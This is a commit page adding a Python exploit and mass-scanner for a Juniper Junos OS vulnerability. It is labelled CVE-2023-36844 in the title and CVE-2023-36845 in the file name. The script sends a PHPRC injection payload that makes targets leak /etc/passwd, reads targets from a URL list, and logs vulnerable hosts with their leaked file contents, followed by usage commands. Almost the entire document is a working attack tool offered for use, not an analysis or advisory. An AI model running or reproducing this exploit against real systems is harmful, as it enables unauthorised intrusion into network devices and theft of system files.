Commit 32a4af7

Add files via upload
Juniper Networks Junos OS remote code execution vulnerability CVE-2023-36844

File tree

1 file changed: +54 -0 lines changed

juniper-cve-2023-36845.py

@@ -0,0 +1,54 @@
# Author: VulnExpo
# Date: 2023-9-22

import requests
import argparse

# Certificate verification is disabled below (verify=False), so silence the TLS warnings.
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

def check_for_vulnerability(url, proxies={}, success_file=None):
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36",
    }
    # PHPRC=/dev/fd/0 makes PHP read its configuration from the request body,
    # where auto_prepend_file causes /etc/passwd to be leaked into the response.
    payload = 'auto_prepend_file="/etc/passwd"'
    try:
        response = requests.post(url + "/?PHPRC=/dev/fd/0", headers=headers, data=payload, proxies=proxies, verify=False)
        if response.status_code == 200 and "root:" in response.text:
            # Record the vulnerable target and the leaked file contents.
            with open(success_file, 'a') as s_file:
                s_file.write("++++++++++++++++++\n")
                s_file.write(f"Target URL: {url}\n")
                s_file.write("Payload: cat /etc/passwd\n")
                s_file.write(f"Response body:\n{response.text}\n\n")
            return True
    except Exception as e:
        print(f"Exception occurred: {e}")
    return False

def scan_targets(targets, proxies={}, success_file=None):
    for target in targets:
        target = target.strip()
        check_for_vulnerability(target, proxies, success_file)

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="Juniper Networks Junos OS remote code execution vulnerability CVE-2023-36844")
    parser.add_argument("-u", "--url", help="Target URL")
    parser.add_argument("-f", "--file", default="url.txt", help="File of target URLs, one per line (default: url.txt)")
    args = parser.parse_args()

    if not args.url and not args.file:
        print("Please use -u to specify a target URL to scan, or use the default file url.txt.")
        exit(1)

    if args.url:
        urls = [args.url]
    elif args.file:
        with open(args.file, 'r') as file:
            urls = file.readlines()

    proxies = {}
    success_file = 'success_targets.txt'

    # scan_targets() strips whitespace from each URL before probing it.
    scan_targets(urls, proxies, success_file)

    print("Scan complete; vulnerable targets have been saved to success_targets.txt.")
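A minimal usage sketch, assuming the script is saved as juniper-cve-2023-36845.py and run with Python 3 with the requests package installed (the target address below is a placeholder):

    # Scan a single target
    python3 juniper-cve-2023-36845.py -u https://192.0.2.10

    # Scan every URL listed in url.txt (the default target file)
    python3 juniper-cve-2023-36845.py -f url.txt

Hits are appended to success_targets.txt, as configured in the __main__ block.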
